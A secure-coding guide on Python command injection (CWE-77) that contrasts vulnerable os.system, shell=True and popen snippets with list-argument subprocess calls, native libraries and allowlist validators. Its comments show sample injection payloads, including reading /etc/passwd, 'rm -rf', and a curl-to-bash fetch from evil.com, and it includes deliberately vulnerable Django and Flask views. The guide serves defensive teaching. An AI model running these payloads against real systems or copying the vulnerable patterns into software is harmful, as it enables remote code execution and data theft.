CWE-77: Command Injection - Python
Overview
Command injection in Python occurs when applications construct system commands using untrusted input. Python's subprocess and os modules can invoke shells, allowing attackers to inject malicious commands.
Primary Defense: Use subprocess.run() or subprocess.Popen() with argument lists (shell=False) instead of shell strings. Never pass untrusted input to os.system(), os.popen(), or any subprocess call with shell=True. Validate all user input against strict allowlists before using it in commands, and prefer Python libraries over shelling out for specific tasks.
Common Vulnerable Patterns
os.system() with User Input
# VULNERABLE - Always uses shell
import os
ip_address = request.GET.get('ip')
os.system('ping -c 4 ' + ip_address)
# Attack: ip=8.8.8.8; cat /etc/passwd
# Executes: ping -c 4 8.8.8.8; cat /etc/passwd
subprocess with shell=True
# VULNERABLE - Shell interpretation enabled
import subprocess
filename = request.POST.get('file')
subprocess.call('ls -la ' + filename, shell=True)
# Attack: file=test.txt && rm -rf /tmp/*
# Executes: ls -la test.txt && rm -rf /tmp/*
os.popen() with Concatenation
# VULNERABLE - Uses shell automatically
import os
domain = request.args.get('domain')
result = os.popen('nslookup ' + domain).read()
# Attack: domain=example.com || whoami
# Executes: nslookup example.com || whoami
String Formatting in Commands
# VULNERABLE - f-string in shell command
import subprocess
host = request.json.get('host')
subprocess.run(f'ping -c 4 {host}', shell=True)
# Attack: host=8.8.8.8; curl http://evil.com/shell.sh | bash
Secure Patterns
Use Python Native Libraries (Primary Defense)
# SECURE - Use Python libraries instead of system commands
# Instead of: os.system('ping ' + host)
import socket
import subprocess
def is_host_reachable(hostname):
    """Return True if *hostname* resolves through the system resolver.

    Despite the name, this only performs a name lookup with
    ``socket.gethostbyname``; no traffic is sent to the host itself.

    Args:
        hostname: Host name or dotted IPv4 address supplied by the caller.

    Returns:
        True when the lookup succeeds, False when it fails.

    Raises:
        ValueError: If hostname is not a non-empty ASCII string made only
            of letters, digits, dots and hyphens.
    """
    # str.isalnum() alone also accepts non-ASCII letters and digits, so
    # require ASCII explicitly before applying the character check.
    if (
        not isinstance(hostname, str)
        or not hostname.isascii()
        or not hostname.replace('.', '').replace('-', '').isalnum()
    ):
        raise ValueError("Invalid hostname")
    try:
        socket.gethostbyname(hostname)
    except (socket.error, UnicodeError):
        # UnicodeError is caught defensively: the lookup may reject names
        # it cannot encode (for example empty or over-long labels).
        return False
    return True
# Instead of: os.system('rm ' + file)
import os
import re
def delete_file(filename):
    """Delete one file inside ``/safe/directory`` using ``os.remove``.

    Args:
        filename: Bare file name (no directory part) chosen by the caller.

    Raises:
        ValueError: If filename is not a string, is ``.`` or ``..``, or
            contains anything other than letters, digits, ``_``, ``.``
            and ``-``.
        OSError: Propagated from ``os.remove`` (for example when the file
            does not exist).
    """
    # fullmatch() is used instead of match() with '$' because '$' also
    # matches just before a trailing newline, letting "name\n" through.
    if (
        not isinstance(filename, str)
        or filename in ('.', '..')
        or not re.fullmatch(r'[a-zA-Z0-9_.-]+', filename)
    ):
        raise ValueError("Invalid filename")
    filepath = os.path.join('/safe/directory', filename)
    os.remove(filepath)
# Instead of: subprocess.call('curl ' + url, shell=True)
import requests
def fetch_url(url):
    """Retrieve *url* with ``requests.get`` and return the response text.

    The request uses a 10 second timeout. No shell or external program
    is involved.
    """
    return requests.get(url, timeout=10).text
# Instead of: os.system('tar -czf archive.tar.gz ' + files)
import tarfile
def _is_safe_archive_member(path):
    """Return True if *path* is a plain relative path safe to archive."""
    if not isinstance(path, str):
        return False
    # fullmatch() rejects a trailing newline that match() with '$' allows.
    if not re.fullmatch(r'[a-zA-Z0-9_./-]+', path):
        return False
    # The character allowlist permits '/' and '.', so absolute paths and
    # '..' components must be excluded explicitly.
    if path.startswith('/'):
        return False
    return '..' not in path.split('/')


def create_archive(file_list, archive_name):
    """Create a gzip-compressed tar archive with the ``tarfile`` module.

    Entries that fail validation are skipped silently, matching the
    original best-effort behaviour; only relative paths without ``..``
    components are added.

    Args:
        file_list: Iterable of relative paths to add to the archive.
        archive_name: Path of the archive file to create.
    """
    with tarfile.open(archive_name, 'w:gz') as tar:
        for file in file_list:
            if not _is_safe_archive_member(file):
                continue
            tar.add(file)
Why this works:
- Native libraries eliminate the shell: `socket.gethostbyname()` uses the system resolver (not `nslookup`), `os.remove()` uses syscalls (not `rm`), `requests.get()` uses sockets (not `curl`), `tarfile.open()` uses zlib (not `tar`)
- Removes attack surface: No shell interpretation means metacharacters (`;`, `&`, `|`, backticks, `$()`, newlines) have no special meaning
- Defense-in-depth validation: Allowlist regexes such as `^[a-zA-Z0-9_.-]+$` reject command separators and path separators even though native libraries don't interpret them
- Path safety: `os.path.join()` anchors the validated filename under a trusted base directory. It does not by itself prevent absolute paths (`/etc/passwd`, which would discard the base) or traversal (`../../etc/shadow`); those are blocked because the filename allowlist rejects `/`
- Standard library advantages: Maintained, cross-platform, auditable modules avoid inconsistent shell escaping (bash/sh/dash/zsh) and OS-specific command syntax
subprocess.run() with List Arguments
# SECURE - Use list form, shell=False (default)
import subprocess
import re
def secure_ping(ip_address):
    """Run ``ping -c 4`` against a validated IPv4 address.

    Args:
        ip_address: Dotted-quad IPv4 address as a string.

    Returns:
        The captured standard output of ``ping`` as text.

    Raises:
        ValueError: If ip_address is not a string holding exactly one
            dotted-quad IPv4 address with octets in 0-255.
        subprocess.TimeoutExpired: If ``ping`` runs longer than 10 seconds.
    """
    ip_pattern = r'((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}' \
                 r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
    # fullmatch() is required: match() with a '$' anchor would also accept
    # "8.8.8.8\n" because '$' matches just before a trailing newline.
    if not isinstance(ip_address, str) or not re.fullmatch(ip_pattern, ip_address):
        raise ValueError("Invalid IP address")
    # List form: each element is passed as one argv entry, with no shell.
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        text=True,
        timeout=10
    )
    return result.stdout
def secure_nslookup(domain):
    """Run ``nslookup`` for a validated domain name.

    Args:
        domain: Domain name made of letters, digits, dots and hyphens.

    Returns:
        The captured standard output of ``nslookup`` as text.

    Raises:
        ValueError: If domain is not a string, is empty or longer than
            253 characters, contains other characters, or starts with a
            hyphen.
        subprocess.TimeoutExpired: If ``nslookup`` runs longer than 5 seconds.
    """
    if (
        not isinstance(domain, str)
        or len(domain) > 253
        # fullmatch() rejects the trailing newline that match() + '$' allows.
        or not re.fullmatch(r'[a-zA-Z0-9.-]+', domain)
        # A leading '-' would be parsed by nslookup as an option
        # (e.g. "-debug"), which is argument injection even without a shell.
        or domain.startswith('-')
    ):
        raise ValueError("Invalid domain name")
    # List form: each element is passed as one argv entry, with no shell.
    result = subprocess.run(
        ['nslookup', domain],
        capture_output=True,
        text=True,
        timeout=5
    )
    return result.stdout
Why this works:
- `subprocess.run()` with a list bypasses the shell: Arguments are passed as distinct elements, not as a shell script
- `shell=False` prevents shell invocation: Direct `fork()`/`exec()` (Linux) or `CreateProcess()` (Windows)
- Metacharacters become literal data: `;`, `&`, `|`, `$()`, backticks are passed as strings, not interpreted
- Strict validation blocks injection attempts: IP/domain regex ensures only valid input passes
- `capture_output=True` avoids shell redirection: Clean stdout/stderr capture without `>`, `2>&1`
- Timeout prevents DoS: Stops slow-resolving domains or hung processes once the configured timeout expires (10 seconds for ping, 5 seconds for nslookup)
Input Validation with Regex
# SECURE - Strict allowlist validation
import re
class InputValidator:
    """Validate user inputs against strict allowlists.

    Every validator returns the accepted value or raises ``ValueError``.
    Patterns end in ``\\Z`` and are applied with ``fullmatch`` because
    ``$`` combined with ``match`` also accepts one trailing newline.
    """

    # Dot-separated labels of 1-63 letters, digits or hyphens. A label may
    # not begin or end with a hyphen, so an accepted value can never look
    # like a command-line option. One trailing dot is permitted.
    HOSTNAME_PATTERN = re.compile(
        r'^(?!-)[a-zA-Z0-9-]{1,63}(?<!-)'
        r'(?:\.(?!-)[a-zA-Z0-9-]{1,63}(?<!-))*\.?\Z'
    )
    # Dotted-quad IPv4 with each octet limited to 0-255.
    IP_PATTERN = re.compile(
        r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
        r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\Z'
    )
    FILENAME_PATTERN = re.compile(r'^[a-zA-Z0-9_.-]+\Z')
    NUMBER_PATTERN = re.compile(r'^[0-9]+\Z')

    @staticmethod
    def validate_hostname(hostname):
        """Return hostname if it is a well-formed name of at most 253 chars."""
        if not hostname:
            raise ValueError("Invalid hostname length")
        if not isinstance(hostname, str):
            raise ValueError("Invalid hostname format")
        if len(hostname) > 253:
            raise ValueError("Invalid hostname length")
        if not InputValidator.HOSTNAME_PATTERN.fullmatch(hostname):
            raise ValueError("Invalid hostname format")
        return hostname

    @staticmethod
    def validate_ip(ip_address):
        """Return ip_address if it is a dotted-quad IPv4 address string."""
        if not isinstance(ip_address, str) or \
                not InputValidator.IP_PATTERN.fullmatch(ip_address):
            raise ValueError("Invalid IP address format")
        return ip_address

    @staticmethod
    def validate_filename(filename):
        """Return filename if it is a bare name with no path components."""
        if not filename:
            raise ValueError("Empty filename")
        if not isinstance(filename, str):
            raise ValueError("Invalid filename format")
        if '..' in filename or '/' in filename or '\\' in filename:
            raise ValueError("Path traversal attempt detected")
        # "." names the containing directory rather than a file.
        if filename == '.' or \
                not InputValidator.FILENAME_PATTERN.fullmatch(filename):
            raise ValueError("Invalid filename format")
        return filename

    @staticmethod
    def validate_number(value):
        """Return value as an int if its string form is ASCII digits only."""
        if not InputValidator.NUMBER_PATTERN.fullmatch(str(value)):
            raise ValueError("Invalid number format")
        return int(value)
Why this works:
- Centralized validation: Compiled `re.compile()` patterns (thread-safe, performant) ensure consistency - all code paths enforce the same strict rules
- Allowlist regex: `^[a-zA-Z0-9.-]+$` blocks shell metacharacters (`;`, `&`, `|`, `>`, `<`, backticks, `$()`, embedded newlines, null bytes) by only permitting safe characters. Note that `$` used with `match()` still tolerates a single trailing newline; use `fullmatch()` or a `\Z` anchor to close that gap
- Specific checks: IP validation (precise IPv4 octets 0-255), path traversal detection (`'..'`, `/`, `\\`), and length limits (≤253 per RFC 1035) prevent injections and DoS
- Fail-closed exceptions: `raise ValueError` for invalid input rejects suspicious data rather than sanitizing it (error-prone); `int()` conversion ensures type safety
- Defense-in-depth: Complements list-based subprocess - validation catches malicious input before command execution even if subprocess is used correctly
Safe Subprocess Execution Pattern
# SECURE - Complete safe execution pattern
import subprocess
import shlex
from pathlib import Path
def execute_command_safely(command, args):
    """Execute an allowlisted command with validated arguments and no shell.

    Args:
        command: Command name; must be a key of the internal allowlist
            (``ping``, ``nslookup`` or ``dig``).
        args: List or tuple of argument strings. Each one must be
            non-empty and consist only of letters, digits and
            ``_ . : = @ + -``.

    Returns:
        The command's captured standard output as text. A non-zero exit
        status is not treated as an error.

    Raises:
        ValueError: If the command is not allowlisted or an argument
            fails validation.
        TypeError: If args is not a list or tuple.
        RuntimeError: If the command times out or cannot be executed.

    Note:
        Option-style arguments such as ``-c`` are still accepted, so
        callers must not place untrusted values where they could be read
        as an option.
    """
    # Allowlist of permitted commands, mapped to absolute paths so that
    # PATH lookup is never involved.
    ALLOWED_COMMANDS = {
        'ping': '/bin/ping',
        'nslookup': '/usr/bin/nslookup',
        'dig': '/usr/bin/dig'
    }
    # Conservative character allowlist for individual arguments.
    SAFE_ARG_CHARS = frozenset(
        'abcdefghijklmnopqrstuvwxyz'
        'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
        '0123456789_.:=@+-'
    )
    if command not in ALLOWED_COMMANDS:
        raise ValueError(f"Command not allowed: {command}")
    if not isinstance(args, (list, tuple)):
        # A bare string would otherwise fail during list concatenation
        # with a less helpful message.
        raise TypeError("args must be a list or tuple of strings")
    for arg in args:
        if (
            not isinstance(arg, str)
            or not arg
            or not all(ch in SAFE_ARG_CHARS for ch in arg)
        ):
            raise ValueError(f"Invalid argument: {arg!r}")
    # Build command with full path
    cmd_list = [ALLOWED_COMMANDS[command]] + list(args)
    # Execute without shell
    try:
        result = subprocess.run(
            cmd_list,
            capture_output=True,
            text=True,
            timeout=30,
            check=False,  # Don't raise on non-zero exit
            shell=False   # CRITICAL: Never use shell
        )
    except subprocess.TimeoutExpired as exc:
        raise RuntimeError("Command timed out") from exc
    except Exception as e:
        # Wrapped so callers only need to handle RuntimeError; the cause
        # is chained for debugging.
        raise RuntimeError(f"Command execution failed: {e}") from e
    return result.stdout
Why this works:
- Command allowlist: `ALLOWED_COMMANDS` dictionary with absolute paths (`/bin/ping`, `/usr/bin/nslookup`) prevents PATH manipulation and arbitrary command execution
- List-based arguments: `cmd_list = [ALLOWED_COMMANDS[command]] + args` passes each arg separately - no shell interpretation, quoting, or escaping needed
- Direct execution: `shell=False` invokes executables directly via `fork()`/`exec()`, not through `/bin/sh -c`; `capture_output=True` captures stdout/stderr without redirection
- DoS prevention: `timeout=30` prevents hangs from unresponsive hosts; `check=False` allows graceful handling of non-zero exit codes
- Defense-in-depth wrapper: Combines allowlisting, argument isolation, timeouts, and clean error messages in a reusable function
Common Python Command Injection Scenarios
File Operations
# VULNERABLE
import os
filename = request.POST.get('file')
os.system(f'cat {filename}')
# SECURE - Use built-in file operations
def read_file_safely(filename):
    """Read a text file located under ``/safe/directory``.

    The name is first checked by ``InputValidator.validate_filename``.
    The resolved target must then lie inside the resolved base directory,
    otherwise ``ValueError("Path traversal attempt")`` is raised.

    Returns:
        The file's contents as a string.
    """
    checked_name = InputValidator.validate_filename(filename)
    base_dir = Path('/safe/directory')
    candidate = base_dir / checked_name
    # Compare resolved paths to confirm the target stays inside the base.
    inside_base = candidate.resolve().is_relative_to(base_dir.resolve())
    if not inside_base:
        raise ValueError("Path traversal attempt")
    with open(candidate, 'r') as handle:
        contents = handle.read()
    return contents
Network Operations
# VULNERABLE
import os
host = request.args.get('host')
os.system(f'curl https://{host}/api/data')
# SECURE - Use requests library
import requests
def fetch_api_data(hostname):
    """GET ``https://<hostname>/api/data`` and return the decoded JSON body.

    The hostname is checked with ``InputValidator.validate_hostname``
    before it is placed in the URL. The request uses a 10 second timeout
    and ``raise_for_status()`` is called on the response before decoding.
    """
    hostname = InputValidator.validate_hostname(hostname)
    endpoint = f'https://{hostname}/api/data'
    reply = requests.get(endpoint, timeout=10)
    reply.raise_for_status()
    payload = reply.json()
    return payload
Image Processing
# VULNERABLE
import os
image_file = request.FILES.get('image').name
os.system(f'convert {image_file} thumbnail.jpg')
# SECURE - Use Pillow library
from PIL import Image
def create_thumbnail(image_path):
    """Write a thumbnail of at most 128x128 pixels to ``thumbnail.jpg``.

    Uses Pillow in-process instead of invoking ImageMagick's ``convert``.

    Args:
        image_path: Bare file name of the source image; it is checked
            with ``InputValidator.validate_filename`` and opened relative
            to the current working directory.

    Raises:
        ValueError: If the file name fails validation.
        OSError: If the image cannot be opened or saved.
    """
    # Validate filename
    filename = InputValidator.validate_filename(image_path)
    # Use Pillow instead of ImageMagick command
    with Image.open(filename) as img:
        img.thumbnail((128, 128))
        # The JPEG writer rejects modes with alpha or a palette
        # (RGBA, LA, P, ...), so convert those to RGB before saving.
        thumb = img if img.mode in ('RGB', 'L', 'CMYK') else img.convert('RGB')
        thumb.save('thumbnail.jpg')
Archive Creation
# VULNERABLE
import os
files = request.POST.get('files')
os.system(f'zip archive.zip {files}')
# SECURE - Use zipfile module
import zipfile
def create_zip_archive(file_list):
    """Create ``archive.zip`` containing the given files via ``zipfile``.

    All names are validated before the archive is opened, so an invalid
    entry raises without leaving a partially written ``archive.zip``.

    Args:
        file_list: Iterable of bare file names, each checked with
            ``InputValidator.validate_filename``.

    Raises:
        ValueError: If any file name fails validation.
        OSError: If a file cannot be read or the archive cannot be written.
    """
    # Validate everything up front; fail before touching the filesystem.
    safe_names = [InputValidator.validate_filename(file) for file in file_list]
    with zipfile.ZipFile('archive.zip', 'w') as zipf:
        for safe_name in safe_names:
            zipf.write(safe_name)
Django-Specific Guidance
# Django view with command injection vulnerability
from django.http import HttpResponse
import subprocess
def vulnerable_view(request):
    """Intentionally vulnerable example view - do not copy.

    Interpolates the ``domain`` query parameter into a command string and
    runs it with ``shell=True``, so shell metacharacters in the parameter
    are interpreted by the shell.
    """
    # VULNERABLE: untrusted input is formatted straight into a shell command
    domain = request.GET.get('domain', '')
    result = subprocess.check_output(f'nslookup {domain}', shell=True)
    return HttpResponse(result)
# SECURE Django view
from django.http import HttpResponse, HttpResponseBadRequest
import subprocess
def secure_view(request):
    """Run ``nslookup`` for the ``domain`` query parameter without a shell.

    Returns:
        400 when the parameter fails validation, 504 when ``nslookup``
        exceeds the 5 second timeout, otherwise a response containing the
        command's standard output.
    """
    domain = request.GET.get('domain', '')
    # Validate input
    try:
        domain = InputValidator.validate_hostname(domain)
    except ValueError as e:
        return HttpResponseBadRequest(str(e))
    # A leading '-' would be parsed by nslookup as an option rather than a
    # host name; reject it here regardless of what the validator allows.
    if domain.startswith('-'):
        return HttpResponseBadRequest("Invalid hostname format")
    # Use list form, no shell
    try:
        result = subprocess.run(
            ['nslookup', domain],
            capture_output=True,
            text=True,
            timeout=5
        )
    except subprocess.TimeoutExpired:
        # The client's request was well-formed; the lookup timed out, so
        # report 504 rather than 400.
        return HttpResponse("Request timeout", status=504)
    return HttpResponse(result.stdout)
Flask-Specific Guidance
# Flask route with command injection vulnerability
from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/ping')
def vulnerable_ping():
    """Intentionally vulnerable example route - do not copy.

    Formats the ``ip`` query parameter into a command string passed to
    ``os.popen``, which runs it through a shell, and returns the output.
    """
    # VULNERABLE: untrusted input is formatted straight into a shell command
    ip = request.args.get('ip')
    result = os.popen(f'ping -c 4 {ip}').read()
    return result
# SECURE Flask route
from flask import Flask, request, abort
import subprocess
@app.route('/ping')
def secure_ping():
    """Ping the address given in the ``ip`` query parameter without a shell.

    Aborts with 400 when ``InputValidator.validate_ip`` rejects the value
    and with 504 when ``ping`` exceeds the 10 second timeout; otherwise
    returns the command's standard output.
    """
    raw_ip = request.args.get('ip', '')
    try:
        ip = InputValidator.validate_ip(raw_ip)
    except ValueError:
        abort(400, "Invalid IP address")
    # Argument vector: each element reaches ping as a separate argv entry.
    argv = ['ping', '-c', '4', ip]
    try:
        completed = subprocess.run(
            argv,
            capture_output=True,
            text=True,
            timeout=10,
        )
    except subprocess.TimeoutExpired:
        abort(504, "Request timeout")
    return completed.stdout
Verification
After implementing the recommended secure patterns, verify the fix through multiple approaches:
- Manual testing: Submit malicious payloads relevant to this vulnerability and confirm they're handled safely without executing unintended operations
- Code review: Confirm all instances use the secure pattern (argument lists with shell=False, native Python APIs, strict allowlist validation) with no string-built commands or other unsafe operations
- Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
- Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
- Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
- Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
- Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
- Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced
Additional Resources
- Bandit Security Linter - Detects subprocess issues
- CWE-77: Command Injection
- OWASP Command Injection
- Python subprocess Documentation